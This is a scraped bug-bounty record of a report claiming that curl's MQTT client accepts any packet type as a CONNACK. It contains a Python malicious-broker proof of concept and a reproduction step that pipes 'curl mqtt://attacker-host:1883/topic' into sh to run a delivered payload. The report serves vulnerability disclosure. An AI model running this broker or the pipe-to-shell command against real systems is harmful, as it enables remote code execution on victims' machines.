{“lastseen”:”2026-05-05T08:32:34″,”description”:”## Summary:\\n\\n`mqtt_verify_connack()` in `lib\/mqtt.c` never checks that the received packet type is actually a CONNACK (`0x20`). The constant `MQTT_MSG_CONNACK` is commented out at line 45, making the check impossible to write. A malicious broker can send any packet \u2014 e.g. PUBACK (`0x40`) \u2014 with `remaining_length=2` and payload `0x00 0x00`, and curl will accept it as a valid handshake, subscribe to the topic, and begin receiving PUBLISH data. Since the broker now fully controls what bytes curl writes to the application’s output, any caller that pipes or executes curl’s output (OTA updaters, script runners, config loaders) is exposed to remote code execution. The existing 8.20.1 guard at lines 895\u2013912 only covers PINGRESP and DISCONNECT \u2014 the CONNACK path is left completely unguarded.\\n\\n“`python\\nimport socket, struct\\n\\ndef fake_connack():\\n return bytes([0x40, 0x02, 0x00, 0x00]) # PUBACK, not CONNACK\\n\\ndef malicious_publish(payload):\\n topic = b\\”x\\”\\n body = struct.pack(\\”\\u003eH\\”, len(topic)) + topic + payload\\n return bytes([0x30, len(body)]) + body\\n\\nsrv = socket.socket()\\nsrv.bind((\\”0.0.0.0\\”, 1883))\\nsrv.listen(1)\\nconn, _ = srv.accept()\\nconn.recv(1024) # discard CONNECT\\nconn.sendall(fake_connack())\\nconn.recv(1024) # discard SUBSCRIBE\\nconn.sendall(malicious_publish(b\\”#!\/bin\/sh\\\\nid\\\\n\\”))\\nconn.close()\\n“`\\n\\n## Affected version\\n\\nConfirmed on curl 8.20.1. The bug is present in `lib\/mqtt.c` and is reproducible on any platform where MQTT support is compiled in (`–with-mqtt`). The `MQTT_MSG_CONNACK` define was commented out before this version; the 8.20.1 MQTT patch (HackerOne #3702718) did not restore it.\\n\\n“`\\ncurl 8.20.1 (x86_64-pc-linux-gnu) libcurl\/8.20.1 OpenSSL\/3.x\\nRelease-Date: 2025-04-16\\nProtocols: mqtt …\\n“`\\n\\n## Steps To Reproduce:\\n\\n1. Run the Python script above on a machine the curl client can reach (e.g. `python3 broker.py`).\\n2. In a second terminal, run:\\n “`sh\\n curl mqtt:\/\/attacker-host:1883\/topic | sh\\n “`\\n3. Observe that curl accepts the fake CONNACK (PUBACK `0x40`) without error, sends a SUBSCRIBE, and then receives the PUBLISH payload.\\n4. The shell executes the payload delivered by the broker \u2014 in the example above, `id` runs and prints the current user. Replace with any command to confirm arbitrary execution.\\n\\nThe root cause is in `mqtt_verify_connack()` (lib\/mqtt.c:404\u2013436): the function checks `remaining_length == 2` and `ptr[0] == 0x00 \\u0026\\u0026 ptr[1] == 0x00` but never checks `mq-\\u003efirstbyte == 0x20`. The constant needed for that check (`MQTT_MSG_CONNACK`) is commented out at line 45. Restoring the define and adding `if(mq-\\u003efirstbyte != MQTT_MSG_CONNACK) return CURLE_WEIRD_SERVER_REPLY;` as the first check in that function fully resolves the issue.\\n\\n## Impact\\n\\n## Summary:\\nDirect RCE \u2014 Any application that pipes curl’s MQTT output to a shell, interpreter, or executor runs attacker code. This is common in IoT deployments, CI\/CD pipelines, and OTA update systems. The attacker doesn’t need a memory corruption exploit \u2014 they just deliver the payload and the application runs it.\\n\\nFirmware takeover \u2014 Embedded devices that use curl to pull firmware over MQTT and then flash it will boot whatever the attacker delivers. No memory corruption needed. Persistent, survives reboots.\\n\\nConfig poisoning \u2014 If curl writes MQTT data to a config file that another process reads (cron, sudoers, nginx config, etc.), the attacker controls that config. Privilege escalation or persistence follow.\\n\\nData integrity \u2014 Even if the application doesn’t execute the data, it processes it as trusted. Sensor readings, telemetry, command payloads \u2014 all can be spoofed. In industrial\/SCADA contexts that alone is critical.\\n\\nWho is at risk: Any curl user using mqtt:\/\/ URLs against a broker the attacker can reach or impersonate. The attacker doesn’t need to be on the local network if TLS is not enforced (and most MQTT deployments don’t enforce it).\\n\\nWhat makes it worse: MQTT is almost exclusively used in automated, unattended contexts \u2014 IoT devices, background services, daemons. There’s no human in the loop to notice something is wrong. The device just executes whatever arrives.\\n\\nThe CONNACK bypass is the entry point. RCE is the consequence. The severity scales with what the application does next.”,”published”:”2026-05-04T13:51:28″,”modified”:”2026-05-05T08:23:07″,”type”:”hackerone”,”title”:”curl: MQTT CONNACK Packet Type Bypass leads to RCE via Malicious Broker”,”source”:””,”references”:””,”id”:”H1:3712343″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3712343″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-05T08:32:34″,”description”:”## Summary:\\n\\n`mqtt_verify_connack()` in `lib\/mqtt.c` never checks that the received packet type is actually a CONNACK (`0x20`). The constant `MQTT_MSG_CONNACK` is commented out at line 45,…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-51423","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n